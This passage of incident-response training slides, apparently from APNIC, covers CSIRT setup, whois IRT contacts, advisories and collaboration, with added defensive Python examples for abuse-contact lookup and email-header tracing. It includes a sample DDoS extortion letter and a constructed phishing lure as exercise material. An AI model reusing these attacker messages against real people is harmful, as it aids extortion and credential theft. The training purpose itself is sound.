– Your Organisation
– Your Customers
– Your country (think Critical Infrastructure)
• Must be managed in order to
– Limit Damage
– Recover (Fix/Patch)
– Prevent recurrence
– Prevent Further Abuse
34
34. Exercise-1
• You might have an incident already
• Visit www.zone-h.com/archive
• Enable filters
– Insert domain
• Let’s Discuss
– What can we learn from this?
– What is the risk for publication of defaced websites?
– Going back to our formula: Risk = Threats + Vulnerabilities
35
35. Exercise-1: Discussion
• Detection
– How do I know about incidents affecting me?
• Analysis
– How ‘bad’ is the situation?
– Google for ZeusTracker, MalwareDomainList
• Recover
– How do I fix this?
• Lessons Learned
– How can we prevent this happening in the future?
– Think PPT!
– Can a series of actions be co-ordinated?
36
36. Whois Database IRT Object
• IRT - Incident Response Team
• Reporting of network abuse can be directed to specialized teams such as Incident Response Teams (IRTs)
• Implemented in AP region by policy Prop-079 in November 2010.
– Mandatory for inetnum, inet6num and aut-num objects created and updated in whois database
• In essence, the contact information must be reachable and can do something about an incident!
37
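The practical use of the IRT object, both here and on the later "Whois Database & Passive DNS" slide, is that an incident handler can go from an offending IP address to a contact that is expected to act. The script below is an added example, not from the deck, that parses whois output of the kind the APNIC database returns, finds the inetnum covering an address, follows its mnt-irt reference to the irt object and returns the abuse mailbox. The whois text is a constructed sample, not a real query result, and the object names in it are invented.

```python
"""Added example (not from the slides): from an IP address to its IRT contact.

Parses RPSL-style whois output (attribute: value lines, objects separated
by blank lines), locates the inetnum that covers a given address, follows
its mnt-irt attribute to the irt object and returns the abuse mailbox.
The whois text below is a constructed sample, not a real query result.
"""
import ipaddress

SAMPLE_WHOIS = """\
% [whois.apnic.net]
% Constructed sample output for illustration only

inetnum:        203.0.113.0 - 203.0.113.255
netname:        EXAMPLE-NET
descr:          Example ISP customer block
country:        AU
admin-c:        EX1-AP
tech-c:         EX1-AP
mnt-irt:        IRT-EXAMPLE-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-EXAMPLE-AP
source:         APNIC

irt:            IRT-EXAMPLE-AP
address:        1 Example Street, Brisbane
e-mail:         security@example.net
abuse-mailbox:  abuse@example.net
admin-c:        EX1-AP
tech-c:         EX1-AP
auth:           # Filtered
mnt-by:         MAINT-EXAMPLE-AP
source:         APNIC
"""


def parse_whois(text):
    """Split whois output into objects: a list of {attribute: [values]} dicts."""
    objects, current = [], {}
    for line in text.splitlines():
        if line.startswith("%"):               # server comment lines
            continue
        if not line.strip():                   # blank line ends an object
            if current:
                objects.append(current)
                current = {}
            continue
        if ":" not in line:
            continue
        attr, _, value = line.partition(":")
        current.setdefault(attr.strip(), []).append(value.strip())
    if current:
        objects.append(current)
    return objects


def _covers(inetnum_range, addr):
    """True if 'a.b.c.d - e.f.g.h' contains addr."""
    lo, _, hi = inetnum_range.partition("-")
    return (int(ipaddress.ip_address(lo.strip()))
            <= int(addr) <= int(ipaddress.ip_address(hi.strip())))


def find_abuse_contact(whois_text, ip):
    """Return the IRT name and mailboxes responsible for ip, or None."""
    addr = ipaddress.ip_address(ip)
    objects = parse_whois(whois_text)
    for obj in objects:
        if "inetnum" not in obj or not _covers(obj["inetnum"][0], addr):
            continue
        for irt_name in obj.get("mnt-irt", []):
            for irt in objects:
                if irt.get("irt", [None])[0] == irt_name:
                    return {
                        "irt": irt_name,
                        "abuse-mailbox": irt.get("abuse-mailbox", [None])[0],
                        "e-mail": irt.get("e-mail", [None])[0],
                    }
    return None


if __name__ == "__main__":
    print(find_abuse_contact(SAMPLE_WHOIS, "203.0.113.77"))
```

In live use the text would come from a query to the RIR's whois server for the address in question; the parsing and the inetnum-to-irt hop stay the same.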
38. What is an incident?
• ITIL terminology defines an incident as:
– Any event which is not part of the standard operation of a service and which causes, or may cause, an interruption to, or a reduction in, the quality of that service
• ISO27001 defines an incident as:
– any event which is not part of the standard operation of a service and which causes or may cause an interruption to, or a reduction in, the quality of that service.
39
39. Incident Response vs. Incident Handling?
• Incident Response is all of the technical components required in order to analyze and contain an incident.
– Skills: requires strong networking, log analysis, and forensics skills.
• Incident Handling is the logistics, communications, coordination, and planning functions needed in order to resolve an incident in a calm and efficient manner.
[isc.sans.org]
40
40. What is an Event?
• An “event” is any observable occurrence in a system and/or network
• Not all events are incidents but all incidents are events
41
41. Objectives of Incident Response
• To mitigate or reduce risks associated with an incident
• To respond to all incidents and suspected incidents based on a pre-determined process
• Provide unbiased investigations on all incidents
• Establish a 24x7 hotline/contact – to enable effective reporting of incidents
• Control and contain an incident
– Affected systems return to normal operation
– Recommend solutions – short term and long term
42
42. Dealing with Incidents – Bottom Line
• What happens if you don’t deal with incidents?
– Become Tomorrow’s Headline (Image)
– IP or Domain Blacklisted (Availability & Financial Loss)
• Linked to Criminals
• The World needs you!
– Trusted point of contact (information on infected or compromised hosts)
– Doing your bit to keep the Internet a safe and secure place for everyone!
43
43. The CSIRT Organisation
• Defining the CSIRT Organisation
• Mission Statement
– High level definition of what the team will do
• Constituency
– Whose incidents are we going to be handling or responsible for
– And to what extent
• CSIRT position / location in the Organisation
• Relation to other teams (or organisations)
44
44. Possible Activities of CSIRTs
• Incident Handling
• Alerts & Warnings
• Vulnerability Handling
• Artefact Handling
• Announcements
• Technology Watch
• Audits/Assessments
• Configure and Maintain Tools/Applications/Infrastructure
• Security Tool Development
• Intrusion Detection
• Information Dissemination
• Risk Analysis
• Business Continuity Planning
• Security Consulting
• Awareness Building
• Education/Training
• Product Evaluation
List from CERT-CC (www.cert.org/csirts/)
45
45. Operations & Availability
• Incidents don’t happen on a particular day or time
• How to ensure 24x7 reachability?
– IRT Object in WHOIS Database
– Email (Mailing List)
– Phone, SMSes
– Information on the Website
– Relationship with National CSIRTs and Other Relevant Organisations
• ISPs, Vendors, Law Enforcement Agencies
46
46. Different kinds of CSIRTs
• The type of activities, focus and capabilities may be different
• Some examples
– National CSIRTs
– Vendor CSIRTs
– (Network & Content) Providers Teams
47
47. Resources Considerations (1)
• People, Process and Technology Requirements
• People
– Resources for:
• Handling Incident Reports (Dedicated?)
• Technical Analysis & Investigation
– What kinds of skills are required?
• Familiarity with technology
• Familiarity with different types of security incidents
• Non-technical skills – Communication, Writing
• Trustworthiness
48
48. Resources Requirements (2)
• Process & Procedures
– Generally from the beginning of the incident until we resolve the incident
– Including lessons learned & improvement of current policies or procedures
– Must be clear so that people know what to do
– Importance
• Specific Procedures for Handling Specific Types of Incidents
– Malware Related
– DDoS
– Web Defacement
– Fraud
– Data Breach
49
50. Applying the Framework - Responding to a DDoS Incident
1. Preparation
2. Identification
3. Containment
4. Remediation
5. Recovery
6. Aftermath/Lessons Learned
51
Reference: cert.societegenerale.com/resources/files/IRM-4-DDoS.pdf
51. Example Team Structure
• First Level
– Helpdesk, Perform Triage
• 2nd Level
– Specialists
• Network Forensics
• Malware Specialists
• Web Security Specialists
• Overall Co-ordination
52
52. Understanding the Role of Others in the Organisation
• Different roles in the organisation
– CEO: to maximise shareholder value
– PR officer: to present a good image to the press
– Corporate Risk: to care about liabilities, good accounting, etc.
– CSIRT: to prevent and resolve incidents
• Don’t assume these interests automatically coincide - but with your help, they can!
53
54. Resources Requirements
• Technology / Tools
• Essentially 2 parts
– For handling incidents & incident-related artifacts
• Managing tickets, secure communications, etc.
• RTIR, OTRS, AIRT are some good examples
– Tools & resources for analysis & investigation
• Depending on the type of work that is required
• For performing:
– Host Analysis, Log Analysis, Traffic Analysis, Network Monitoring, Forensics, Malware Analysis
– Tools that support standards for exchanging threat intel with other teams (STIX & TAXII)
55
56. Phish Response Checklist
1. Analyse / Report of Spam
2. Phishing Site Take Down
– Removal / Suspension
– Browser Notification
3. Phishing Site Analysis
– Phishkits ?
4. Credentials ‘Stolen’
– Notify Users
5. Report / Escalation
6. Lessons Learned
57
57. Advisories and Alerts
• Scenarios that potentially require an Advisory or Alert
– Incidents that could potentially have a wide-scale impact
– Examples
• Declaration by attacker to launch attack
• Critical vulnerability of ‘popular’ software in the constituency
• Some types of incidents require action by those in your constituencies
– They have to apply the patch themselves
– Their network or systems are not reachable to you
– They must perform additional risk assessment
– Perform checks to ensure that they are not vulnerable
58
58. Advisories and Alerts (2)
• Content
– Should be clear & concise
• What is impacted
• Whether a fix or workaround is available
– Shouldn’t be confusing
– A guide on how to determine or apply the fix could be useful
• Distribution of advisories and alerts
– Preparation of targeted lists based on industry, common systems, groups
– Using suitable platforms to reach out (including media)
– Goal is to reach out as quickly as possible to the right
• Special Programs with Vendors
– Early alert – e.g. Microsoft
59
59. Working with Law Enforcement Agencies & Judiciary Sector
• Some incidents have elements of crime
– ‘Cyber’ or non-cyber laws
– Regulatory framework
• Implication
– Must work with Law Enforcement Agency (must notify)
– Preservation of digital evidence (logs, images, etc.)
• Proper configuration of systems, time, etc.
– Working together with LEAs to investigate
• Monitoring, recording and tracking
• Responding to requests
• Training and Cyber Security Exercises can help to create awareness
60
60. Collaboration & Information Sharing
• Bad guys work together, good guys should too!
• Make yourself known, establish trust, collaborate and learn from others
• Associations of CSIRTs
– National CSIRTs groups (in some countries)
– Regional – APCERT, OIC-CERT, TF-CSIRT
– Global – FIRST.org
• Closed & Trusted Security Groups
– NSP-SEC
– OPS-TRUST
• Getting feeds about your constituencies (and sharing with them)
– ShadowServer Foundation
– Team Cymru
– Honeynet Project
61
61. Getting Involved
• Global Take Downs / Co-ordinated Response
– DNSChanger Working Group
– Conficker Working Group
• Cyber Security Exercises
– Multiple teams & multiple scenario activities
– Getting to know your peers and improving internal processes and capabilities
– Example: APCERT Drill, ASEAN Drill, etc.
• Helping Promote Best Practices & Awareness
– Source Address Validation (BCP 38)
– APWG Stop – Think – Connect (APWG.org)
62
62. Collaboration & Co-operation
• Check out some of the security organisations mentioned earlier
– APCERT – http://www.apcert.org
– FIRST – http://www.first.org
– ShadowServer Foundation – http://www.shadowserver.org
– Team Cymru – https://www.team-cymru.org/Services/
– Honeynet Project – http://www.honeynet.org
63
63. Managing a CSIRT
• Having sufficient resources is critical to maintain CERT / CSIRT operation
• Consider having funds for travelling to participate in workshops, training and meetings
64
65. About this Module
• This module covers some publicly available tools that can be used for managing incident reports and performing (initial) analysis
• Depending on the nature of the incident, different sets of tools will have to be used by the incident responder
• It is by no means comprehensive but useful to gain initial insights when handling an incident
66
66. Managing Incident Reports
• There may be multiple ways to contact a CERT / CSIRT
– Email, Web Form, Fax, Security Systems
– Should ensure that reports (tickets) are attended to
• Workflow System for managing abuse reports and artifacts
– Web-based system
– Reflect policies for incident response / handling activities
– Artifacts: Logs, executables
– Generate reports for review and lessons learned
• Some Solutions:
– RTIR: RT for Incident Response http://bestpractical.com/rtir/
– OTRS: https://www.otrs.com/software/open-source/
67
68. Spam and Web Defacement
• Spam Header Analysis
– http://mxtoolbox.com/Public/Tools/EmailHeaders.aspx
• Zone-H Defacement Archive
– http://www.zone-h.com
69
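The header-analysis tools the slide points to all do the same first job: walk the Received headers from the top (added by your own server) downwards to find the earliest hop you can actually trust. The script below is an added example, not from the deck, that does this for a constructed message: only hops written by MTAs you control are believed, and the originating IP is the sending address recorded by the last trusted hop, because anything below that could have been forged by the spammer. The message, hostnames and addresses are all constructed.

```python
"""Added example (not from the slides): finding where a spam/phishing mail
really entered the mail system.

Received headers are prepended by each MTA, so the top one is the newest.
Only hops written by MTAs you control can be trusted; headers below the
first untrusted hop may have been forged by the sender.  The message,
hostnames and addresses below are constructed.
"""
import re
from email import message_from_string

# Constructed phishing message.  Folded header lines start with spaces.
SAMPLE_MESSAGE = """\
Received: from mx.example.net (mx.example.net [203.0.113.25])
    by mail.victim.example with ESMTP id abc123
    for <user@victim.example>; Thu, 05 Jun 2014 10:01:02 +0000
Received: from relay.isp.example (relay.isp.example [198.51.100.8])
    by mx.example.net with ESMTP; Thu, 05 Jun 2014 10:01:00 +0000
Received: from [192.0.2.77] (unknown [192.0.2.77])
    by relay.isp.example with SMTP; Thu, 05 Jun 2014 10:00:58 +0000
From: "Bank Support" <support@bank.example>
To: user@victim.example
Subject: Please reactivate your account

Dear Intelligent User, please reactivate your account here: http://www.bla.com.my
"""

BY_RE = re.compile(r"\bby\s+([A-Za-z0-9.\-]+)")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_hops(raw_message):
    """Return the Received hops, newest first, as {"by", "from_ip", "raw"} dicts."""
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())           # unfold continuation lines
        by = BY_RE.search(text)
        ip = IP_RE.search(text)                  # first bracketed literal = sender
        hops.append({"by": by.group(1) if by else None,
                     "from_ip": ip.group(1) if ip else None,
                     "raw": text})
    return hops


def originating_ip(hops, trusted_mtas):
    """Sender IP recorded by the last hop written by an MTA we trust.

    Walk from the newest hop downwards while the 'by' host is ours; the
    first hop written by someone else (or forged) ends the trusted chain.
    """
    candidate = None
    for hop in hops:
        if hop["by"] in trusted_mtas:
            candidate = hop["from_ip"]
        else:
            break
    return candidate


if __name__ == "__main__":
    hops = received_hops(SAMPLE_MESSAGE)
    for hop in hops:
        print(f"{hop['from_ip']:>15} -> {hop['by']}")
    print("verifiable sender:", originating_ip(hops, {"mail.victim.example"}))
```

Which hop counts as "origin" depends entirely on how far your trust extends: with only your own inbound MX trusted, the verifiable sender is the relay that handed the message to you (203.0.113.25 here), and it is that relay's abuse contact you report to; the 192.0.2.77 address further down is only evidence once the intermediate MTAs are confirmed as reliable.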
69. Whois Database & Passive DNS
• The whois database is an indispensable tool for incident handling.
• An RIR’s whois database gives information about a network, e.g. who is the point of contact
• But we also need historical data on who used to own it
– May show something suspicious
• Passive DNS:
– http://www.bfk.de/bfk_dnslogger.html
70
70. Abuse Information about your Network
• There are multiple initiatives on the Internet that could be of use to gain information about abuses or potential abuses on your network
1. Abuse.ch – Zeus, SpyEye, Palevo, Feodo malware trackers, e.g. http://zeustracker.abuse.ch
2. Malware Domain List
– http://www.malwaredomainlist.com/
– http://www.malwaredomains.com/
3. Open DNS Resolvers
– http://openresolverproject.org/
71
71. Secure Communication Tools
• Best practice is to use GnuPG/PGP for communication
– For signing and/or encrypting messages
– Extremely useful for information sharing (especially on a need-to-know basis)
• Keys that belong to others (teams or individuals) are published on public PGP key servers
– http://pgp.mit.edu
• ‘Key-signing’ parties are common at CSIRT meetings or gatherings
72
73. Exercise – 1
• Defining your CERT/CSIRT based on RFC2350
– RFC2350 - Expectations for Computer Security Incident Response
– https://www.rfc-editor.org/rfc/rfc2350.txt
74
74. Exercise 2 – From .RU (or somewhere) with Love
75
Date: Day, Month 2011
Subject: Partnership
From: Attacker
To: Victim
Your site does not work because We attack your site.
When your company will pay to us we will stop attack.
Contact the director. Do not lose clients.
75. Exercise 3 – Writing a Security Advisory
• Information about a critical vulnerability affecting a popular application.
• Write a security advisory to your constituents explaining the situation and the action required of them
76
76. Recap
• We have covered
– The bigger picture – Managing Risks and Cyber Security
– The need to respond to incidents
– Setting up Security Response Teams
• Defining the Team & Team Structure
• Resources required
• Policies, SOPs, SLAs
• Tools for incident handlers
• Making yourself known and working with others
• Keep Calm & Incident Response!
77
78. APNIC Survey 2014
• 11 -22 June 2014
• Opportunity to provide input on APNIC’s performance,
development, and future direction
• Contributes to APNIC’s future planning processes
• Run by an impartial, independent research organization
• Confidentiality of respondents guaranteed
79
survey.apnic.net